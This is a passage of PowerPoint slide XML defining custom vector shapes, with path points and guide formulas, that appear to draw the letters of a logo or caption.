              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9305925" y="4362451"/>
                  <a:ext cx="26988" cy="38100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 17"/>
                    <a:gd name="T1" fmla="*/ 24 h 24"/>
                    <a:gd name="T2" fmla="*/ 0 w 17"/>
                    <a:gd name="T3" fmla="*/ 0 h 24"/>
                    <a:gd name="T4" fmla="*/ 0 w 17"/>
                    <a:gd name="T5" fmla="*/ 0 h 24"/>
                    <a:gd name="T6" fmla="*/ 16 w 17"/>
                    <a:gd name="T7" fmla="*/ 18 h 24"/>
                    <a:gd name="T8" fmla="*/ 16 w 17"/>
                    <a:gd name="T9" fmla="*/ 0 h 24"/>
                    <a:gd name="T10" fmla="*/ 17 w 17"/>
                    <a:gd name="T11" fmla="*/ 0 h 24"/>
                    <a:gd name="T12" fmla="*/ 17 w 17"/>
                    <a:gd name="T13" fmla="*/ 24 h 24"/>
                    <a:gd name="T14" fmla="*/ 17 w 17"/>
                    <a:gd name="T15" fmla="*/ 24 h 24"/>
                    <a:gd name="T16" fmla="*/ 1 w 17"/>
                    <a:gd name="T17" fmla="*/ 6 h 24"/>
                    <a:gd name="T18" fmla="*/ 1 w 17"/>
                    <a:gd name="T19" fmla="*/ 24 h 24"/>
                    <a:gd name="T20" fmla="*/ 0 w 17"/>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4">
                      <a:moveTo>
                        <a:pt x="0" y="24"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="18"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="6"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="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298"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9340850" y="4362451"/>
                  <a:ext cx="34925" cy="38100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 11 w 22"/>
                    <a:gd name="T1" fmla="*/ 0 h 24"/>
                    <a:gd name="T2" fmla="*/ 22 w 22"/>
                    <a:gd name="T3" fmla="*/ 24 h 24"/>
                    <a:gd name="T4" fmla="*/ 19 w 22"/>
                    <a:gd name="T5" fmla="*/ 24 h 24"/>
                    <a:gd name="T6" fmla="*/ 16 w 22"/>
                    <a:gd name="T7" fmla="*/ 15 h 24"/>
                    <a:gd name="T8" fmla="*/ 6 w 22"/>
                    <a:gd name="T9" fmla="*/ 15 h 24"/>
                    <a:gd name="T10" fmla="*/ 1 w 22"/>
                    <a:gd name="T11" fmla="*/ 24 h 24"/>
                    <a:gd name="T12" fmla="*/ 0 w 22"/>
                    <a:gd name="T13" fmla="*/ 24 h 24"/>
                    <a:gd name="T14" fmla="*/ 10 w 22"/>
                    <a:gd name="T15" fmla="*/ 0 h 24"/>
                    <a:gd name="T16" fmla="*/ 11 w 22"/>
                    <a:gd name="T17" fmla="*/ 0 h 24"/>
                    <a:gd name="T18" fmla="*/ 10 w 22"/>
                    <a:gd name="T19" fmla="*/ 5 h 24"/>
                    <a:gd name="T20" fmla="*/ 7 w 22"/>
                    <a:gd name="T21" fmla="*/ 13 h 24"/>
                    <a:gd name="T22" fmla="*/ 14 w 22"/>
                    <a:gd name="T23" fmla="*/ 13 h 24"/>
                    <a:gd name="T24" fmla="*/ 10 w 22"/>
                    <a:gd name="T25"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4">
                      <a:moveTo>
                        <a:pt x="11" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="22" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="15"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="15"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="11" y="0"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="10" y="5"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="7" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1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299"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9378950" y="4362451"/>
                  <a:ext cx="42863" cy="38100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 27"/>
                    <a:gd name="T1" fmla="*/ 24 h 24"/>
                    <a:gd name="T2" fmla="*/ 3 w 27"/>
                    <a:gd name="T3" fmla="*/ 0 h 24"/>
                    <a:gd name="T4" fmla="*/ 3 w 27"/>
                    <a:gd name="T5" fmla="*/ 0 h 24"/>
                    <a:gd name="T6" fmla="*/ 14 w 27"/>
                    <a:gd name="T7" fmla="*/ 19 h 24"/>
                    <a:gd name="T8" fmla="*/ 22 w 27"/>
                    <a:gd name="T9" fmla="*/ 0 h 24"/>
                    <a:gd name="T10" fmla="*/ 24 w 27"/>
                    <a:gd name="T11" fmla="*/ 0 h 24"/>
                    <a:gd name="T12" fmla="*/ 27 w 27"/>
                    <a:gd name="T13" fmla="*/ 24 h 24"/>
                    <a:gd name="T14" fmla="*/ 24 w 27"/>
                    <a:gd name="T15" fmla="*/ 24 h 24"/>
                    <a:gd name="T16" fmla="*/ 22 w 27"/>
                    <a:gd name="T17" fmla="*/ 6 h 24"/>
                    <a:gd name="T18" fmla="*/ 14 w 27"/>
                    <a:gd name="T19" fmla="*/ 24 h 24"/>
                    <a:gd name="T20" fmla="*/ 14 w 27"/>
                    <a:gd name="T21" fmla="*/ 24 h 24"/>
                    <a:gd name="T22" fmla="*/ 5 w 27"/>
                    <a:gd name="T23" fmla="*/ 6 h 24"/>
                    <a:gd name="T24" fmla="*/ 2 w 27"/>
                    <a:gd name="T25" fmla="*/ 24 h 24"/>
                    <a:gd name="T26" fmla="*/ 0 w 27"/>
                    <a:gd name="T2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4">
                      <a:moveTo>
                        <a:pt x="0" y="24"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="3" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="19"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="22" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="27" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="22" y="6"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="6"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="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300"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9428163" y="4362451"/>
                  <a:ext cx="20638" cy="38100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 13"/>
                    <a:gd name="T1" fmla="*/ 0 h 24"/>
                    <a:gd name="T2" fmla="*/ 13 w 13"/>
                    <a:gd name="T3" fmla="*/ 0 h 24"/>
                    <a:gd name="T4" fmla="*/ 13 w 13"/>
                    <a:gd name="T5" fmla="*/ 2 h 24"/>
                    <a:gd name="T6" fmla="*/ 3 w 13"/>
                    <a:gd name="T7" fmla="*/ 2 h 24"/>
                    <a:gd name="T8" fmla="*/ 3 w 13"/>
                    <a:gd name="T9" fmla="*/ 9 h 24"/>
                    <a:gd name="T10" fmla="*/ 13 w 13"/>
                    <a:gd name="T11" fmla="*/ 9 h 24"/>
                    <a:gd name="T12" fmla="*/ 13 w 13"/>
                    <a:gd name="T13" fmla="*/ 12 h 24"/>
                    <a:gd name="T14" fmla="*/ 3 w 13"/>
                    <a:gd name="T15" fmla="*/ 12 h 24"/>
                    <a:gd name="T16" fmla="*/ 3 w 13"/>
                    <a:gd name="T17" fmla="*/ 21 h 24"/>
                    <a:gd name="T18" fmla="*/ 13 w 13"/>
                    <a:gd name="T19" fmla="*/ 21 h 24"/>
                    <a:gd name="T20" fmla="*/ 13 w 13"/>
                    <a:gd name="T21" fmla="*/ 24 h 24"/>
                    <a:gd name="T22" fmla="*/ 0 w 13"/>
                    <a:gd name="T23" fmla="*/ 24 h 24"/>
                    <a:gd name="T24" fmla="*/ 0 w 13"/>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4">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="13" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="2"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="9"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="9"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="21"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="2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301"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9455150" y="4371976"/>
                  <a:ext cx="7938" cy="28575"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1 w 3"/>
                    <a:gd name="T1" fmla="*/ 0 h 12"/>
                    <a:gd name="T2" fmla="*/ 2 w 3"/>
                    <a:gd name="T3" fmla="*/ 0 h 12"/>
                    <a:gd name="T4" fmla="*/ 3 w 3"/>
                    <a:gd name="T5" fmla="*/ 1 h 12"/>
                    <a:gd name="T6" fmla="*/ 2 w 3"/>
                    <a:gd name="T7" fmla="*/ 2 h 12"/>
                    <a:gd name="T8" fmla="*/ 1 w 3"/>
                    <a:gd name="T9" fmla="*/ 2 h 12"/>
                    <a:gd name="T10" fmla="*/ 0 w 3"/>
                    <a:gd name="T11" fmla="*/ 2 h 12"/>
                    <a:gd name="T12" fmla="*/ 0 w 3"/>
                    <a:gd name="T13" fmla="*/ 1 h 12"/>
                    <a:gd name="T14" fmla="*/ 0 w 3"/>
                    <a:gd name="T15" fmla="*/ 0 h 12"/>
                    <a:gd name="T16" fmla="*/ 1 w 3"/>
                    <a:gd name="T17" fmla="*/ 0 h 12"/>
                    <a:gd name="T18" fmla="*/ 1 w 3"/>
                    <a:gd name="T19" fmla="*/ 9 h 12"/>
                    <a:gd name="T20" fmla="*/ 2 w 3"/>
                    <a:gd name="T21" fmla="*/ 10 h 12"/>
                    <a:gd name="T22" fmla="*/ 3 w 3"/>
                    <a:gd name="T23" fmla="*/ 11 h 12"/>
                    <a:gd name="T24" fmla="*/ 2 w 3"/>
                    <a:gd name="T25" fmla="*/ 12 h 12"/>
                    <a:gd name="T26" fmla="*/ 1 w 3"/>
                    <a:gd name="T27" fmla="*/ 12 h 12"/>
                    <a:gd name="T28" fmla="*/ 0 w 3"/>
                    <a:gd name="T29" fmla="*/ 12 h 12"/>
                    <a:gd name="T30" fmla="*/ 0 w 3"/>
                    <a:gd name="T31" fmla="*/ 11 h 12"/>
                    <a:gd name="T32" fmla="*/ 0 w 3"/>
                    <a:gd name="T33" fmla="*/ 10 h 12"/>
                    <a:gd name="T34" fmla="*/ 1 w 3"/>
                    <a:gd name="T35"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12">
                      <a:moveTo>
                        <a:pt x="1" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="0"/>
                        <a:pt x="2" y="0"/>
                        <a:pt x="2" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="0"/>
                        <a:pt x="3" y="0"/>
                        <a:pt x="3" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="1"/>
                        <a:pt x="3" y="2"/>
                        <a:pt x="2" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="2"/>
                        <a:pt x="2" y="2"/>
                        <a:pt x="1" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="2"/>
                        <a:pt x="1" y="2"/>
                        <a:pt x="0" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="2"/>
                        <a:pt x="0" y="1"/>
                        <a:pt x="0" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="0"/>
                        <a:pt x="0" y="0"/>
                        <a:pt x="0" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="0"/>
                        <a:pt x="1" y="0"/>
                        <a:pt x="1" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="1" y="9"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="10"/>
                        <a:pt x="3" y="10"/>
                        <a:pt x="3" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="11"/>
                        <a:pt x="3" y="11"/>
                        <a:pt x="2" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="12"/>
                        <a:pt x="2" y="12"/>
                        <a:pt x="1" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="12"/>
                        <a:pt x="1" y="12"/>
                        <a:pt x="0" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="11"/>
                        <a:pt x="0" y="11"/>
                        <a:pt x="0" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="10"/>
                        <a:pt x="0" y="10"/>
                        <a:pt x="0" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="9"/>
                        <a:pt x="1" y="9"/>
                        <a:pt x="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302"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9510713" y="4362451"/>
                  <a:ext cx="19050" cy="38100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 6 w 8"/>
                    <a:gd name="T1" fmla="*/ 0 h 16"/>
                    <a:gd name="T2" fmla="*/ 8 w 8"/>
                    <a:gd name="T3" fmla="*/ 0 h 16"/>
                    <a:gd name="T4" fmla="*/ 8 w 8"/>
                    <a:gd name="T5" fmla="*/ 10 h 16"/>
                    <a:gd name="T6" fmla="*/ 7 w 8"/>
                    <a:gd name="T7" fmla="*/ 14 h 16"/>
                    <a:gd name="T8" fmla="*/ 6 w 8"/>
                    <a:gd name="T9" fmla="*/ 15 h 16"/>
                    <a:gd name="T10" fmla="*/ 4 w 8"/>
                    <a:gd name="T11" fmla="*/ 16 h 16"/>
                    <a:gd name="T12" fmla="*/ 2 w 8"/>
                    <a:gd name="T13" fmla="*/ 16 h 16"/>
                    <a:gd name="T14" fmla="*/ 0 w 8"/>
                    <a:gd name="T15" fmla="*/ 14 h 16"/>
                    <a:gd name="T16" fmla="*/ 1 w 8"/>
                    <a:gd name="T17" fmla="*/ 13 h 16"/>
                    <a:gd name="T18" fmla="*/ 3 w 8"/>
                    <a:gd name="T19" fmla="*/ 14 h 16"/>
                    <a:gd name="T20" fmla="*/ 4 w 8"/>
                    <a:gd name="T21" fmla="*/ 15 h 16"/>
                    <a:gd name="T22" fmla="*/ 5 w 8"/>
                    <a:gd name="T23" fmla="*/ 14 h 16"/>
                    <a:gd name="T24" fmla="*/ 6 w 8"/>
                    <a:gd name="T25" fmla="*/ 13 h 16"/>
                    <a:gd name="T26" fmla="*/ 6 w 8"/>
                    <a:gd name="T27" fmla="*/ 10 h 16"/>
                    <a:gd name="T28" fmla="*/ 6 w 8"/>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16">
                      <a:moveTo>
                        <a:pt x="6" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="0"/>
                        <a:pt x="8" y="0"/>
                        <a:pt x="8" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="10"/>
                        <a:pt x="8" y="10"/>
                        <a:pt x="8" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="12"/>
                        <a:pt x="7" y="13"/>
                        <a:pt x="7" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="15"/>
                        <a:pt x="6" y="15"/>
                        <a:pt x="6" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="16"/>
                        <a:pt x="5" y="16"/>
                        <a:pt x="4" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="16"/>
                        <a:pt x="2" y="16"/>
                        <a:pt x="2" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="15"/>
                        <a:pt x="0" y="15"/>
                        <a:pt x="0" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="13"/>
                        <a:pt x="1" y="13"/>
                        <a:pt x="1" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="14"/>
                        <a:pt x="2" y="14"/>
                        <a:pt x="3" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="15"/>
                        <a:pt x="3" y="15"/>
                        <a:pt x="4" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="15"/>
                        <a:pt x="5" y="14"/>
                        <a:pt x="5" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="14"/>
                        <a:pt x="6" y="14"/>
                        <a:pt x="6" y="13"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="13"/>
                        <a:pt x="6" y="12"/>
                        <a:pt x="6" y="1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03"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9536113" y="4360863"/>
                  <a:ext cx="39688" cy="39688"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 8 w 17"/>
                    <a:gd name="T1" fmla="*/ 0 h 17"/>
                    <a:gd name="T2" fmla="*/ 14 w 17"/>
                    <a:gd name="T3" fmla="*/ 3 h 17"/>
                    <a:gd name="T4" fmla="*/ 17 w 17"/>
                    <a:gd name="T5" fmla="*/ 9 h 17"/>
                    <a:gd name="T6" fmla="*/ 14 w 17"/>
                    <a:gd name="T7" fmla="*/ 15 h 17"/>
                    <a:gd name="T8" fmla="*/ 8 w 17"/>
                    <a:gd name="T9" fmla="*/ 17 h 17"/>
                    <a:gd name="T10" fmla="*/ 2 w 17"/>
                    <a:gd name="T11" fmla="*/ 15 h 17"/>
                    <a:gd name="T12" fmla="*/ 0 w 17"/>
                    <a:gd name="T13" fmla="*/ 9 h 17"/>
                    <a:gd name="T14" fmla="*/ 1 w 17"/>
                    <a:gd name="T15" fmla="*/ 4 h 17"/>
                    <a:gd name="T16" fmla="*/ 4 w 17"/>
                    <a:gd name="T17" fmla="*/ 1 h 17"/>
                    <a:gd name="T18" fmla="*/ 8 w 17"/>
                    <a:gd name="T19" fmla="*/ 0 h 17"/>
                    <a:gd name="T20" fmla="*/ 8 w 17"/>
                    <a:gd name="T21" fmla="*/ 2 h 17"/>
                    <a:gd name="T22" fmla="*/ 5 w 17"/>
                    <a:gd name="T23" fmla="*/ 3 h 17"/>
                    <a:gd name="T24" fmla="*/ 2 w 17"/>
                    <a:gd name="T25" fmla="*/ 5 h 17"/>
                    <a:gd name="T26" fmla="*/ 1 w 17"/>
                    <a:gd name="T27" fmla="*/ 9 h 17"/>
                    <a:gd name="T28" fmla="*/ 3 w 17"/>
                    <a:gd name="T29" fmla="*/ 14 h 17"/>
                    <a:gd name="T30" fmla="*/ 8 w 17"/>
                    <a:gd name="T31" fmla="*/ 16 h 17"/>
                    <a:gd name="T32" fmla="*/ 12 w 17"/>
                    <a:gd name="T33" fmla="*/ 15 h 17"/>
                    <a:gd name="T34" fmla="*/ 14 w 17"/>
                    <a:gd name="T35" fmla="*/ 12 h 17"/>
                    <a:gd name="T36" fmla="*/ 15 w 17"/>
                    <a:gd name="T37" fmla="*/ 9 h 17"/>
                    <a:gd name="T38" fmla="*/ 14 w 17"/>
                    <a:gd name="T39" fmla="*/ 5 h 17"/>
                    <a:gd name="T40" fmla="*/ 12 w 17"/>
                    <a:gd name="T41" fmla="*/ 3 h 17"/>
                    <a:gd name="T42" fmla="*/ 8 w 17"/>
                    <a:gd name="T4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7">
                      <a:moveTo>
                        <a:pt x="8" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="0"/>
                        <a:pt x="13" y="1"/>
                        <a:pt x="14" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="4"/>
                        <a:pt x="17" y="6"/>
                        <a:pt x="17" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="11"/>
                        <a:pt x="16" y="13"/>
                        <a:pt x="14" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="16"/>
                        <a:pt x="11" y="17"/>
                        <a:pt x="8" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="17"/>
                        <a:pt x="4" y="16"/>
                        <a:pt x="2" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="13"/>
                        <a:pt x="0" y="11"/>
                        <a:pt x="0" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="7"/>
                        <a:pt x="0" y="6"/>
                        <a:pt x="1" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="3"/>
                        <a:pt x="3" y="2"/>
                        <a:pt x="4" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="1"/>
                        <a:pt x="7" y="0"/>
                        <a:pt x="8" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="8" y="2"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="2"/>
                        <a:pt x="6" y="2"/>
                        <a:pt x="5" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="3"/>
                        <a:pt x="3" y="4"/>
                        <a:pt x="2" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="6"/>
                        <a:pt x="1" y="7"/>
                        <a:pt x="1" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="11"/>
                        <a:pt x="2" y="12"/>
                        <a:pt x="3" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="15"/>
                        <a:pt x="6" y="16"/>
                        <a:pt x="8" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="16"/>
                        <a:pt x="11" y="15"/>
                        <a:pt x="12" y="15"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="14"/>
                        <a:pt x="13" y="13"/>
                        <a:pt x="14" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="11"/>
                        <a:pt x="15" y="10"/>
                        <a:pt x="15" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="7"/>
                        <a:pt x="15" y="6"/>
                        <a:pt x="14" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="4"/>
                        <a:pt x="13" y="3"/>
                        <a:pt x="12" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="2"/>
                        <a:pt x="9" y="2"/>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304"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9582150" y="4362451"/>
                  <a:ext cx="25400" cy="38100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 16"/>
                    <a:gd name="T1" fmla="*/ 0 h 24"/>
                    <a:gd name="T2" fmla="*/ 2 w 16"/>
                    <a:gd name="T3" fmla="*/ 0 h 24"/>
                    <a:gd name="T4" fmla="*/ 2 w 16"/>
                    <a:gd name="T5" fmla="*/ 9 h 24"/>
                    <a:gd name="T6" fmla="*/ 15 w 16"/>
                    <a:gd name="T7" fmla="*/ 9 h 24"/>
                    <a:gd name="T8" fmla="*/ 15 w 16"/>
                    <a:gd name="T9" fmla="*/ 0 h 24"/>
                    <a:gd name="T10" fmla="*/ 16 w 16"/>
                    <a:gd name="T11" fmla="*/ 0 h 24"/>
                    <a:gd name="T12" fmla="*/ 16 w 16"/>
                    <a:gd name="T13" fmla="*/ 24 h 24"/>
                    <a:gd name="T14" fmla="*/ 15 w 16"/>
                    <a:gd name="T15" fmla="*/ 24 h 24"/>
                    <a:gd name="T16" fmla="*/ 15 w 16"/>
                    <a:gd name="T17" fmla="*/ 12 h 24"/>
                    <a:gd name="T18" fmla="*/ 2 w 16"/>
                    <a:gd name="T19" fmla="*/ 12 h 24"/>
                    <a:gd name="T20" fmla="*/ 2 w 16"/>
                    <a:gd name="T21" fmla="*/ 24 h 24"/>
                    <a:gd name="T22" fmla="*/ 0 w 16"/>
                    <a:gd name="T23" fmla="*/ 24 h 24"/>
                    <a:gd name="T24" fmla="*/ 0 w 16"/>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4">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="2" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2" y="9"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="9"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2" y="12"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="2" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="2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305"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9617075" y="4362451"/>
                  <a:ext cx="30163" cy="38100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 19"/>
                    <a:gd name="T1" fmla="*/ 24 h 24"/>
